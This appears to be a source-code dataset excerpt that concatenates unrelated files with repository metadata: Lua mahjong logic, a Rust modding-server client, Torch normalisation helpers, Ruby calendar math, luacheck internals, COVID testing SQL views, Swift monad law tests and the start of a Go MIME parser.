for _,item in ipairs(builds) do
for value=item.start,item.close do
local card = help.getCard(item.color,value)
map[card] = true
for again=1,item.again do
table.insert(lis,card)
end
end
end
end
---系统定庄
function logic:gameSystemDingZhuang()
local zhuangs = self:getData(senum.zhuangs())
local maxseat = self:maxPlayer()
if table.empty(zhuangs) then
---随机庄家
local banker = math.random(1,maxseat)
self:setDriver(senum.zhuang(),banker)
table.insert(zhuangs,banker)
return
end
local huangs = self:getData(senum.huangs())
if table.last(huangs) then
---慌庄连庄
local banker = table.last(zhuangs)
self:setDriver(senum.zhuang(),banker)
table.insert(zhuangs,banker)
return
end
---首胡坐庄|点炮多响
local banker = self:getData(senum.dingZhuang())
self:setDriver(senum.zhuang(),banker)
table.insert(zhuangs,banker)
end
---系统发牌
function logic:gameSystemFapai()
local users = self:arrPlayer()
local cards = self:paiKu()
for _,player in ipairs(users) do
local hands = player:getHands()
for again=1,13 do
local card = table.remove(cards)
table.insert(hands,card)
end
end
local player = self:banker()
--庄家摸牌
self:gameSystemMoPai(player)
end
---摸牌操作
---@param player mahjongPlayer
function logic:gameSystemMoPai(player)
local hands = player:getHands()
local card = table.remove(self:paiKu())
table.insert(hands,card)
end
---出牌
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableChuPai(player)
local hands = player:getHands()
--检查数量
local count = #hands
if 2 ~= count % 3 then
return false
end
return true
end
---碰牌
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ablePengPai(player)
local hands = player:getHands()
--检查玩家
if player == self._last_chupai_play then
return false
end
--检查数量
local count = #hands
if 1 ~= count % 3 then
return false
end
--检查出牌
local card = self._last_chupai_card
if not table.existCount(hands,card,2) then
return false
end
return true
end
---直杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableZhiGang(player)
local hands = player:getHands()
--检查玩家
if player == self._last_chupai_play then
return false
end
--检查数量
local count = #hands
if 1 ~= count % 3 then
return false
end
--检查出牌
local card = self._last_chupai_card
if not table.existCount(hands,card,3) then
return false
end
return true
end
local copy1 = {nil}
---绕杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableRaoGang(player)
local hands = player:getHands()
--检查数量
local count = #hands
if 2 ~= count % 3 then
return false
end
--检查绕杠
local list = table.clear(copy1)
local pengs = player:getPengs()
for _,card in ipairs(pengs) do
if table.exist(hands,card) then
table.insert(list,card)
end
end
local ok = not table.empty(list)
return ok,list
end
local copy1 = {nil}
local copy2 = {nil}
---暗杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableAnGang(player)
local hands = player:getHands()
--检查数量
local count = #hands
if 2 ~= count % 3 then
return false
end
--检查暗杠
local list = table.clear(copy1)
local maps = table.arrToHas(hands,copy2)
for card,count in ipairs(maps) do
if count >= 4 then
table.insert(list,card)
end
end
local ok = not table.empty(list)
return ok,list
end
---点炮
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableDianPao(player)
end
---抢杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableQiangGang(player)
end
---自摸
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableZiMo(player)
end
---出牌操作
---@param player mahjongPlayer @玩家
---@param card mjCard @出牌
function logic:gamePlayingChuPai(player,card)
---最后出牌
---@type mjCard
self._last_chupai_card = card
---出牌玩家
---@type mahjongPlayer
self._last_chupai_play = player
end
return logic | 20.57947 | 55 | 0.651167 | 3.15625 |
6fe07f6bbcf564bf1355bbc028f03e5afbd1aeaa | 8,829 | rs | Rust | binary/src/cli/remote.rs | iiYese/OMFG | 38162bdc322de53d50bb34abc6fd244636694cb7 | [
"MIT"
] | null | null | null | binary/src/cli/remote.rs | iiYese/OMFG | 38162bdc322de53d50bb34abc6fd244636694cb7 | [
"MIT"
] | null | null | null | binary/src/cli/remote.rs | iiYese/OMFG | 38162bdc322de53d50bb34abc6fd244636694cb7 | [
"MIT"
] | null | null | null | use std::{
io::{Write, Read},
fs::{File, rename}, path::{Path, PathBuf},
env::current_exe
};
use reqwest::{
StatusCode,
blocking::{Client, multipart::Form}
};
use serde::{Serialize, Deserialize};
use anyhow::{Context, anyhow, bail, Result as AnyHow};
use mac_address::get_mac_address;
use short_crypt::ShortCrypt;
use crate::utils::{PathBufExt, DebugPrint};
use super::*;
#[derive(Serialize, Deserialize)]
struct Credentials {
email: String,
access_key: String,
}
pub struct ClientHandle {
client: Client,
server: String,
credentials: Credentials,
}
impl ClientHandle {
fn crypt() -> AnyHow<ShortCrypt> {
let crypt = ShortCrypt::new(
get_mac_address()?
.ok_or(anyhow!("Could not get key for encryption"))?
.to_string()
);
Ok(crypt)
}
pub fn save_credentials(email: &str, access_key: &str) -> AnyHow<()> {
let crypt = Self::crypt()?;
let credentials = Credentials {
email: email.to_string(),
access_key: access_key.to_string()
};
let (base, credentials) = crypt.encrypt(&serde_json::to_string(&credentials)?);
let path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("credentials");
path.write_plus("")?;
let mut file = File::create(path)
.map_err(|e| anyhow!("Failed to open credentials file: {}", e))?;
file.write_all(&[&[base], credentials.as_slice()].concat())
.map_err(|e| anyhow!("Failed to write credentials: {}", e))
}
pub fn new(server: &str) -> AnyHow<Self> {
let credential_path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("credentials");
let f = File::open(credential_path)?;
let mut reader = std::io::BufReader::new(f);
let mut contents = Vec::new();
// Read file into vector.
reader.read_to_end(&mut contents)?;
let crypt = Self::crypt()?;
if contents.len() < 2 {
bail!("Corrupt credentials file");
}
let contents = crypt
.decrypt(&(contents[0], contents[1..].to_vec()))
.map_err(|e| anyhow!("Could not decrypt credentials: {}", e))?;
Ok(
ClientHandle {
client: Client::new(),
server: server.to_string(),
credentials: serde_json::from_str(std::str::from_utf8(contents.as_slice())?)?
}
)
}
pub fn list_projects(&self) -> AnyHow<()>{
let resp: ProjectList = self
.client
.post(&format!("{}/list_projects", self.server))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
println!(
"{:#?}",
resp.extract()?
);
Ok(())
}
pub fn create_project(&self) -> AnyHow<String> {
let resp: CreateProj = self
.client
.post(&format!("{}/create_project", self.server))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
let id = resp.extract()?;
println!("{}", id);
Ok(id)
}
pub fn delete_project(&self, map_id: &str) -> AnyHow<()> {
let resp: GenericResponse = self
.client
.post(&format!("{}/delete_project/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
resp.ok()
}
pub fn get_status(&self, map_id: &str) -> AnyHow<()> {
let resp: ModdingStatus = self
.client
.post(&format!("{}/modding_status/{}", self.server, map_id))
.send()?
.json()?;
println!("{}", resp.status);
Ok(())
}
fn change_modding(&self, map_id: &str, to: &str) -> AnyHow<()> {
let resp: GenericResponse = self
.client
.post(&format!("{}/{}_modding/{}", self.server, to, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
resp.ok()
// query server again to get new status
}
pub fn try_open(&self, map_id: &str) -> AnyHow<()> {
self.change_modding(map_id, "open")
}
pub fn try_close(&self, map_id: &str) -> AnyHow<()> {
self.change_modding(map_id, "close")
}
pub fn check_upto_date(&self, map_id: &str, sum: u32) -> AnyHow<()> {
let resp: Checksum = self
.client
.get(&format!("{}/get_checksum/{}", self.server, map_id))
.send()?
.json()?;
if resp.sum != sum {
println!("Checksum mismatch");
}
println!("ok");
Ok(())
}
pub fn submit_map(&self, map_id: &str, path: &Path) -> AnyHow<()> {
let resp: GenericResponse = self
.client
.post(&format!("{}/update_map/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.multipart(Form::new().file("file", path)?)
.send()?
.json()?;
resp.ok()
}
pub fn fetch_project(&self, map_id: &str) -> AnyHow<Vec<u8>> {
let resp = self
.client
.post(&format!("{}/sync/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?;
match resp.status() {
StatusCode::OK => {
let bytes = resp.bytes()?;
Ok(bytes.to_vec())
},
StatusCode::NOT_FOUND => {
bail!("Project not found");
},
_ => {
bail!("Failed to fetch project");
}
}
}
pub fn submit_mods(&self, map_id: &str, mod_paths: &[PathBuf]) -> AnyHow<()> {
let zip_path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("temp");
let file = File::create(&zip_path)?;
let mut zip = zip::ZipWriter::new(file);
let options = zip::write::FileOptions::default();
for path in mod_paths {
let name = path
.file_name()
.context("Could not get file name")?
.to_str()
.context("Could not convert to string")?;
zip.start_file(name, options)?;
zip.write_all(path.read()?.as_bytes())?;
}
zip.finish()?;
let resp: ModSubmission = self
.client
.post(&format!("{}/submit_mods/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.multipart(Form::new().file("zip_file", &zip_path)?)
.send()?
.json()?;
let new_ids = resp.ok()?;
for path in mod_paths {
let old = path
.file_name()
.context("Could not get file name")?
.to_str()
.context("Could not convert to string")?;
let new = path.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join(&new_ids[old]);
rename(path, &new)?;
}
Ok(())
}
pub fn submit_patches(&self, map_id: &str, temp_path: &Path, patched: Vec<String>) -> AnyHow<()> {
let zip_path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("temp");
let file = File::create(&zip_path)?;
let mut zip = zip::ZipWriter::new(file);
let options = zip::write::FileOptions::default();
zip.start_file("map_file", options)?;
zip.write_all(temp_path.to_path_buf().read()?.as_bytes())?;
zip.start_file("changes.json", options)?;
let changes_json = serde_json::to_string(&Patches{ patched })?;
zip.write_all(changes_json.as_bytes())?;
zip.finish()?;
let resp: GenericResponse = self.client
.post(&format!("{}/patch_mods/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.multipart(Form::new().file("zip_file", zip_path)?)
.send()?
.json()?;
resp.ok()
}
}
| 29.235099 | 102 | 0.508891 | 3.125 |
1410c372222c2ae5c4ad890f48fd7478a98bef6f | 5,255 | lua | Lua | torch_lua/src/util/torch_util.lua | migushu/rul-1 | a25f8a21ab978cfef2826ed7918de6dccaaa1c22 | [
"MIT"
] | 17 | 2017-11-22T19:14:49.000Z | 2021-11-09T07:22:52.000Z | torch_lua/src/util/torch_util.lua | johnsbuck/rul | a25f8a21ab978cfef2826ed7918de6dccaaa1c22 | [
"MIT"
] | null | null | null | torch_lua/src/util/torch_util.lua | johnsbuck/rul | a25f8a21ab978cfef2826ed7918de6dccaaa1c22 | [
"MIT"
] | 4 | 2018-11-19T01:35:56.000Z | 2020-02-17T05:47:07.000Z | ----------------------------------------------------------------------
-- A utility module containing Torch-based functions for editing
-- tensors, normalization, and other purposes.
-- @author John Bucknam
-- @license MIT
-- @module Torch-Utilities
----------------------------------------------------------------------
require 'torch'
----------------------------------------------------------------------
-- Matrix Utilities
-- @section matrix-utilities
----------------------------------------------------------------------
---
-- Measures the covariance between 2 tensors with 1-D data vectors.
-- @tensor x
-- @tensor y
-- @treturn number The covariance of x and y
function rutil.cov(x, y)
local len = x:size()[1]
local covariance = 0
for i=1, len do
local a = x[i] - x:mean()
local b = y[i] - y:mean()
covariance = covariance + (a*b)/len
end
return covariance
end
---
-- Creates a covariance matrix for a given tensor.
-- @tensor X
-- @treturn tensor A 2-D matrix with matrix[i][j] corresponding to cov(i,j)
function rutil.cov_matrix(X)
local len = X:size()[2]
local matrix = torch.Tensor(len,len)
for i=1, len do
print("I: ", i)
for j=1, len do
print("J: ", j)
matrix[i][j] = rutil.cov(X[{{},i}], X[{{},j}])
end
end
return matrix
end
---
-- Measures the correlation between 2 tensors with 1-D data vectors.
-- @tensor x
-- @tensor y
-- @treturn number The correlation of x and y
function rutil.corr(x,y)
local correlation = 0
return rutil.cov(x,y)/(x:std()*y:std())
end
----------------------------------------------------------------------
-- Normalization
-- @section normalization
----------------------------------------------------------------------
---
-- Subtracts each point of a given
-- tensor by the minimum and divides by
-- the difference between the maximum
-- and minimum.
--
-- Feature Scaling Formula: (x - Low_X)/(High_X - Low_X)
--
-- @tensor data Vectors in given Tensor
-- @treturn tensor Scaled tensor based on minimum and maximum
function rutil.scale_features(data)
local info = data:clone()
-- Feature Scaling
if #info:size() > 1 then
for i=1, info:size()[2] do
local min = info[{{},i}]:min()
local max = info[{{},i}]:max()
if max ~= min then
info[{{},i}]:add(-min)
info[{{},i}]:div(max-min)
else
info[{{},i}]:add(-min+1)
end
end
else
local min = info:min()
local max = info:max()
if max ~= min then
info:add(-min)
info:div(max-min)
else
info[{{},i}]:add(-min+1)
end
end
return info
end
---
-- Takes an existing tensor and subtracts each value by its column's
-- mean. Afterwards, it divides itself by its standard deviation.
--
-- Standardization Formula: (x - MEAN) / STD
--
-- @tensor data A Torch tensor containing data to be normalized.
-- @treturn tensor A normalized Torch tensor of the same type as data.
function rutil.standardize(data)
local info = data:clone()
-- Standardization
if #info:size() > 1 then
MEAN = {}
STD = {}
for i=1, info:size()[#info:size()] do
MEAN[i] = info[{{},i}]:mean()
STD[i] = info[{{},i}]:std()
info[{{},i}]:add(-info[{{},i}]:mean())
info[{{},i}]:div(info[{{},i}]:std())
end
else
MEAN = info:mean()
STD = info:std()
info:add(-info:mean())
info:div(info:std())
end
return info
end
---
-- Takes a standardized Tensor and multiples it by the STD.
-- It then adds the MEAN to each data point.
--
-- Destandardize Formula: (x * prevSTD) + prevMEAN
--
-- @tensor data A Torch Tensor containing data vectors.
-- @treturn tensor A destandardized tensor.
function rutil.destandardize(data)
local info = data:clone()
-- Standardization
if #info:size() > 1 then
for i=1, info:size()[#info:size()] do
info[{{},i}]:mul(STD[i])
info[{{},i}]:add(MEAN[i])
end
else
info:mul(STD)
info:add(MEAN)
end
return info
end
----------------------------------------------------------------------
-- Normalization based on Previous Data Vector
-- @section normalization-prev-data
----------------------------------------------------------------------
---
-- Returns all data points as the log of themselves
-- minus the log of their previous data point.
--
-- Subtractive Log Formula: ln(close_price[i]) - ln(close_price[i-1])
--
-- @tensor data A Torch Tensor containing data vectors.
-- @treturn tensor A normalized Torch tensor of the same type as data.
function rutil.log_prev(data)
local info = data:clone()
--Previous log minus
info = info:log()
for i=1, info:size()[1] - 1 do
info[i] = info[i] - info[i+1]
end
return info
end
---
-- Returns a Tensor with each point being subtracted
-- by the previous point and divided by the previous point.
--
-- Divisive Percent Formula: ((X[i] - X[i-1]) * 100)/X[i-1]
--
-- @tensor data A Torch Tensor containing data vectors.
-- @treturn tensor A normalized Torch tensor of the same type as data.
function rutil.percent_prev(data)
local info = data:clone()
--Previous percent
for i=1, info:size()[1] - 1 do
info[i] = (info[i] - info[i+1])/info[i+1]
end
return info
end
| 25.386473 | 75 | 0.559087 | 3.640625 |
abb91dc04859d56df64cca8558f1c74a23a34fe4 | 5,928 | rb | Ruby | lib/calendrical/base.rb | kipcole9/calendrical-ruby | e7e5693fa582c443ed3802fc8eed1dd98b59e9f3 | [
"MIT"
] | 1 | 2016-09-19T11:23:08.000Z | 2016-09-19T11:23:08.000Z | lib/calendrical/base.rb | kipcole9/calendrical-ruby | e7e5693fa582c443ed3802fc8eed1dd98b59e9f3 | [
"MIT"
] | null | null | null | lib/calendrical/base.rb | kipcole9/calendrical-ruby | e7e5693fa582c443ed3802fc8eed1dd98b59e9f3 | [
"MIT"
] | null | null | null | module Calendrical
class InvalidQuarter < StandardError; end
class InvalidMonth < StandardError; end
class InvalidWeek < StandardError; end
class InvalidDay< StandardError; end
class UnknownLunarPhase < StandardError; end
class DayError < StandardError; end
class MonthError < StandardError; end
class StartEnd < StandardError; end
class Proximity < StandardError; end
class Type < StandardError; end
class DanglingDays < StandardError; end
module Base
# see lines 249-252 in calendrica-3.0.cl
# m // n
# The following
# from operator import floordiv as quotient
# is not ok, the corresponding CL code
# uses CL 'floor' which always returns an integer
# (the floating point equivalent is 'ffloor'), while
# 'quotient' from operator module (or corresponding //)
# can return a float if at least one of the operands
# is a float...so I redefine it (and 'floor' and 'round' as well: in CL
# they always return an integer.)
#
# Ruby floor always returns an integer
def quotient(m, n)
(m / n).floor
end
# Add iround for compatibility with the CL and python code
def iround(x)
x.round
end
# m % n (this works as described in book for negative integres)
# It is interesting to note that
# mod(1.5, 1)
# returns the decimal part of 1.5, so 0.5; given a moment 'm'
# mod(m, 1)
# returns the time of the day
# Ruby mod behaves per the book
# from operator import mod
# see lines 254-257 in calendrica-3.0.cl
# Return the same as a % b with b instead of 0.
def amod(x, y)
y + (x % -y)
end
# see lines 502-510 in calendrica-3.0.cl
# Return those moments in list ell that occur in range 'range'.
def list_range(ell, range)
ell.select{|l| range.include?(l) }.compact
end
# see lines 482-485 in calendrica-3.0.cl
# Return the range data structure."""
def interval(t0, t1)
t0..t1
end
# see lines 259-264 in calendrica-3.0.cl
# Return first integer greater or equal to initial index, i,
# such that condition, p, holds.
def next_of(i, p)
x = i
while !p.call(x) do
x += 1
end
x
end
# see lines 266-271 in calendrica-3.0.cl
# Return last integer greater or equal to initial index, i,
# such that condition, p, holds.
def final_of(i, p)
if not p.call(i)
return i - 1
else
final_of(i+1, p)
end
end
# see lines 273-281 in calendrica-3.0.cl
# Return the sum of f(i) from i=k, k+1, ... till p(i) holds true or 0.
# This is a tail recursive implementation.
def summa(f, k, p)
if not p.call(k)
return 0
else
f.call(k) + summa(f, k+1, p)
end
end
# Return the sum of f(i) from i=k, k+1, ... till p(i) holds true or 0.
# This is an implementation of the Summation formula from Kahan,
# see Theorem 8 in Goldberg, David 'What Every Computer Scientist
# Should Know About Floating-Point Arithmetic', ACM Computer Survey,
# Vol. 23, No. 1, March 1991.
def altsumma(f, k, p)
if not p.call(k)
return 0
else
s = f.call(k)
c = 0
j = k + 1
while p.call(j) do
y = f.call(j) - c
t = s + y
c = (t - s) - y
s = t
j += 1
end
end
return s
end
# see lines 283-293 in calendrica-3.0.cl
# Bisection search for x in [lo, hi] such that condition 'e' holds.
# p determines when to go left.
def binary_search(lo, hi, p, e)
x = (lo + hi) / 2
if p.call(lo, hi)
return x
elsif e.call(x)
return binary_search(lo, x, p, e)
else
return binary_search(x, hi, p, e)
end
end
# see lines 295-302 in calendrica-3.0.cl
# Find inverse of angular function 'f' at 'y' within interval [a,b].
# Default precision is 0.00001
def invert_angular(f, y, a, b, prec = 10**-5)
binary_search(a, b,
lambda{|l, h| ((h - l) <= prec)},
lambda{|x| ((f.call(x) - y) % 360) < 180}
)
end
#def invert_angular(f, y, a, b):
# from scipy.optimize import brentq
# return(brentq((lambda x: mod(f(x) - y), 360)), a, b, xtol=error)
# see lines 304-313 in calendrica-3.0.cl
# Return the sum of body 'b' for indices i1..in
# running simultaneously thru lists l1..ln.
# List 'l' is of the form [[i1 l1]..[in ln]]
def sigma(l, b)
# 'l' is a list of 'n' lists of the same lenght 'L' [l1, l2, l3, ...]
# 'b' is a lambda with 'n' args
# 'sigma' sums all 'L' applications of 'b' to the relevant tuple of args
# >>> a = [ 1, 2, 3, 4]
# >>> b = [ 5, 6, 7, 8]
# >>> c = [ 9,10,11,12]
# >>> l = [a,b,c]
# >>> z = zip(*l)
# >>> z
# [(1, 5, 9), (2, 6, 10), (3, 7, 11), (4, 8, 12)]
# >>> b = lambda x, y, z: x * y * z
# >>> b(*z[0]) # apply b to first elem of i
# 45
# >>> temp = []
# >>> z = zip(*l)
# >>> for e in z: temp.append(b(*e))
# >>> temp
# [45, 120, 231, 384]
# >>> from operator import add
# >>> reduce(add, temp)
# 780
# return sum(b(*e) for e in zip(*l))
# puts "Zipped: #{l.first.zip(*l[1..-1]).map{|x| b.call(*x)}}"
l.first.zip(*l[1..-1]).map{|x| b.call(*x)}.reduce(:+)
end
# see lines 315-321 in calendrica-3.0.cl
# Calculate polynomial with coefficients 'a' at point x.
# The polynomial is a[0] + a[1] * x + a[2] * x^2 + ...a[n-1]x^(n-1)
# the result is
# a[0] + x(a[1] + x(a[2] +...+ x(a[n-1])...)
def poly(x, a)
# This implementation is also known as Horner's Rule.
n = a.length - 1
p = a[n]
for i in 1..n do
p = p * x + a[n-i]
end
p
end
end
end | 30.244898 | 78 | 0.550776 | 3.25 |
42cc0ac1546cae4ebc687ac3254e52adae4e8ef0 | 1,792 | lua | Lua | src/luacheck/check_state.lua | srinivas32/luacheck | 7ab26494a4a0f41c6f96e85fda846045429e3326 | [
"MIT"
] | 1,641 | 2015-01-03T18:57:09.000Z | 2022-03-30T22:08:29.000Z | src/luacheck/check_state.lua | srinivas32/luacheck | 7ab26494a4a0f41c6f96e85fda846045429e3326 | [
"MIT"
] | 206 | 2015-01-05T09:22:24.000Z | 2022-03-10T03:33:54.000Z | src/luacheck/check_state.lua | srinivas32/luacheck | 7ab26494a4a0f41c6f96e85fda846045429e3326 | [
"MIT"
] | 299 | 2015-01-07T02:08:52.000Z | 2022-03-27T10:26:47.000Z | local utils = require "luacheck.utils"
local check_state = {}
local CheckState = utils.class()
function CheckState:__init(source_bytes)
self.source_bytes = source_bytes
self.warnings = {}
end
-- Returns column of a character in a line given its offset.
-- The column is never larger than the line length.
-- This can be called if line length is not yet known.
function CheckState:offset_to_column(line, offset)
local line_length = self.line_lengths[line]
local column = offset - self.line_offsets[line] + 1
if not line_length then
return column
end
return math.max(1, math.min(line_length, column))
end
function CheckState:warn_column_range(code, range, warning)
warning = warning or {}
warning.code = code
warning.line = range.line
warning.column = range.column
warning.end_column = range.end_column
table.insert(self.warnings, warning)
return warning
end
function CheckState:warn(code, line, offset, end_offset, warning)
warning = warning or {}
warning.code = code
warning.line = line
warning.column = self:offset_to_column(line, offset)
warning.end_column = self:offset_to_column(line, end_offset)
table.insert(self.warnings, warning)
return warning
end
function CheckState:warn_range(code, range, warning)
return self:warn(code, range.line, range.offset, range.end_offset, warning)
end
function CheckState:warn_var(code, var, warning)
warning = self:warn_range(code, var.node, warning)
warning.name = var.name
return warning
end
function CheckState:warn_value(code, value, warning)
warning = self:warn_range(code, value.var_node, warning)
warning.name = value.var.name
return warning
end
function check_state.new(source_bytes)
return CheckState(source_bytes)
end
return check_state
| 26.746269 | 78 | 0.748884 | 3.390625 |
962a8dc6e1a9a3cddabcba9d35fc5a6ceaac1001 | 3,118 | sql | SQL | hasura/migrations/1597267956798_window_views/up.sql | wbez/il-covid19-api | 1d0b89ec2b104af804ee203b5d83400d2a97d1ed | [
"MIT"
] | null | null | null | hasura/migrations/1597267956798_window_views/up.sql | wbez/il-covid19-api | 1d0b89ec2b104af804ee203b5d83400d2a97d1ed | [
"MIT"
] | 12 | 2020-07-28T16:50:16.000Z | 2020-10-16T16:23:16.000Z | hasura/migrations/1597267956798_window_views/up.sql | wbez/il-covid19-api | 1d0b89ec2b104af804ee203b5d83400d2a97d1ed | [
"MIT"
] | 3 | 2020-07-31T21:20:30.000Z | 2021-07-15T13:33:24.000Z | CREATE MATERIALIZED VIEW public.state_testing_results_change
AS
SELECT
date,
total_tested,
total_tested - lag(total_tested) OVER (ORDER BY date) AS total_tested_change,
round(
(
(total_tested - lag(total_tested) OVER (ORDER BY date))::numeric / lag(total_tested) OVER (ORDER BY date)
) * 100,
2
) AS total_tested_change_pct,
confirmed_cases,
confirmed_cases - lag(confirmed_cases) OVER (ORDER BY date) AS confirmed_cases_change,
round(
(
(confirmed_cases - lag(confirmed_cases) OVER (ORDER BY date))::numeric / lag(confirmed_cases) OVER (ORDER BY date)
) * 100,
2
) AS confirmed_cases_change_pct,
confirmed_cases - deaths AS confirmed_cases_minus_deaths,
deaths,
deaths - lag(deaths) OVER (ORDER BY date) AS deaths_change,
CASE
WHEN lag(deaths) OVER (ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(deaths - lag(deaths) OVER (ORDER BY date))::numeric / lag(deaths) OVER (ORDER BY date)
) * 100,
2
)
END
AS deaths_change_pct
FROM public.state_testing_results
GROUP BY date, total_tested, confirmed_cases, deaths
ORDER BY date DESC;
CREATE MATERIALIZED VIEW public.county_testing_results_change
AS
SELECT
date,
county,
census_geography_id,
total_tested,
total_tested - lag(total_tested) OVER (PARTITION BY county ORDER BY date) AS total_tested_change,
CASE
WHEN lag(total_tested) OVER (PARTITION BY county ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(total_tested - lag(total_tested) OVER (PARTITION BY county ORDER BY date))::numeric / lag(total_tested) OVER (PARTITION BY county ORDER BY date)
) * 100,
2
)
END
AS total_tested_change_pct,
confirmed_cases,
confirmed_cases - lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date) AS confirmed_cases_change,
CASE
WHEN lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(confirmed_cases - lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date))::numeric / lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date)
) * 100,
2
)
END
AS confirmed_cases_change_pct,
confirmed_cases - deaths AS confirmed_cases_minus_deaths,
deaths,
deaths - lag(deaths) OVER (PARTITION BY county ORDER BY date) AS deaths_change,
CASE
WHEN lag(deaths) OVER (PARTITION BY county ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(deaths - lag(deaths) OVER (PARTITION BY county ORDER BY date))::numeric / lag(deaths) OVER (PARTITION BY county ORDER BY date)
) * 100,
2
)
END
AS deaths_change_pct
FROM public.county_testing_results
GROUP BY date, county, census_geography_id, total_tested, confirmed_cases, deaths
ORDER BY date DESC;
| 35.431818 | 170 | 0.63406 | 3.265625 |
cb8c1143da35971ebc1b2488297e747858737071 | 1,079 | swift | Swift | Tests/BowLaws/MonadStateLaws.swift | Dragna/bow | 8cd19a4fd84463b53ce1b0772bec96d84f9f5007 | [
"Apache-2.0"
] | null | null | null | Tests/BowLaws/MonadStateLaws.swift | Dragna/bow | 8cd19a4fd84463b53ce1b0772bec96d84f9f5007 | [
"Apache-2.0"
] | null | null | null | Tests/BowLaws/MonadStateLaws.swift | Dragna/bow | 8cd19a4fd84463b53ce1b0772bec96d84f9f5007 | [
"Apache-2.0"
] | null | null | null | import Foundation
import SwiftCheck
@testable import Bow
class MonadStateLaws<F: MonadState & EquatableK> where F.S == Int {
static func check() {
getIdempotent()
setTwice()
setGet()
getSet()
}
private static func getIdempotent() {
property("Idempotence") <- forAll { (_: Int) in
return F.flatMap(F.get(), { _ in F.get() }) == F.get()
}
}
private static func setTwice() {
property("Set twice is equivalent to set only the second") <- forAll { (s: Int, t: Int) in
return isEqual(F.flatMap(F.set(s), { _ in F.set(t) }), F.set(t))
}
}
private static func setGet() {
property("Get after set retrieves the original value") <- forAll { (s: Int) in
return F.flatMap(F.set(s), { _ in F.get() }) == F.flatMap(F.set(s), { _ in F.pure(s) })
}
}
private static func getSet() {
property("Get set") <- forAll { (_: Int) in
return isEqual(F.flatMap(F.get(), F.set), F.pure(()))
}
}
}
| 28.394737 | 99 | 0.531047 | 3.21875 |
a13b4c76945bcf9c9e5830aae8366268e006c06b | 6,588 | go | Go | part.go | cinience/go.enmime | 3702bd9092afd46a33a80af5bec693960b583418 | [
"MIT"
] | null | null | null | part.go | cinience/go.enmime | 3702bd9092afd46a33a80af5bec693960b583418 | [
"MIT"
] | null | null | null | part.go | cinience/go.enmime | 3702bd9092afd46a33a80af5bec693960b583418 | [
"MIT"
] | null | null | null | package enmime
import (
"bufio"
"bytes"
"encoding/base64"
"fmt"
"io"
"mime"
"mime/multipart"
"net/textproto"
"strings"
"github.com/sloonz/go-qprintable"
)
// MIMEPart is the primary interface enmine clients will use. Each MIMEPart represents
// a node in the MIME multipart tree. The Content-Type, Disposition and File Name are
// parsed out of the header for easier access.
//
// TODO Content should probably be a reader so that it does not need to be stored in
// memory.
type MIMEPart interface {
Parent() MIMEPart // Parent of this part (can be nil)
FirstChild() MIMEPart // First (top most) child of this part
NextSibling() MIMEPart // Next sibling of this part
Header() textproto.MIMEHeader // Header as parsed by textproto package
ContentType() string // Content-Type header without parameters
Disposition() string // Content-Disposition header without parameters
FileName() string // File Name from disposition or type header
Charset() string // Content Charset
Content() []byte // Decoded content of this part (can be empty)
}
// memMIMEPart is an in-memory implementation of the MIMEPart interface. It will likely
// choke on huge attachments.
type memMIMEPart struct {
parent MIMEPart
firstChild MIMEPart
nextSibling MIMEPart
header textproto.MIMEHeader
contentType string
disposition string
fileName string
charset string
content []byte
}
// NewMIMEPart creates a new memMIMEPart object. It does not update the parents FirstChild
// attribute.
func NewMIMEPart(parent MIMEPart, contentType string) *memMIMEPart {
return &memMIMEPart{parent: parent, contentType: contentType}
}
// Parent of this part (can be nil)
func (p *memMIMEPart) Parent() MIMEPart {
return p.parent
}
// First (top most) child of this part
func (p *memMIMEPart) FirstChild() MIMEPart {
return p.firstChild
}
// Next sibling of this part
func (p *memMIMEPart) NextSibling() MIMEPart {
return p.nextSibling
}
// Header as parsed by textproto package
func (p *memMIMEPart) Header() textproto.MIMEHeader {
return p.header
}
// Content-Type header without parameters
func (p *memMIMEPart) ContentType() string {
return p.contentType
}
// Content-Disposition header without parameters
func (p *memMIMEPart) Disposition() string {
return p.disposition
}
// File Name from disposition or type header
func (p *memMIMEPart) FileName() string {
return p.fileName
}
// Content charset
func (p *memMIMEPart) Charset() string {
return p.charset
}
// Decoded content of this part (can be empty)
func (p *memMIMEPart) Content() []byte {
return p.content
}
// ParseMIME reads a MIME document from the provided reader and parses it into
// tree of MIMEPart objects.
func ParseMIME(reader *bufio.Reader) (MIMEPart, error) {
tr := textproto.NewReader(reader)
header, err := tr.ReadMIMEHeader()
if err != nil {
return nil, err
}
mediatype, params, err := mime.ParseMediaType(header.Get("Content-Type"))
if err != nil {
return nil, err
}
root := &memMIMEPart{header: header, contentType: mediatype}
if strings.HasPrefix(mediatype, "multipart/") {
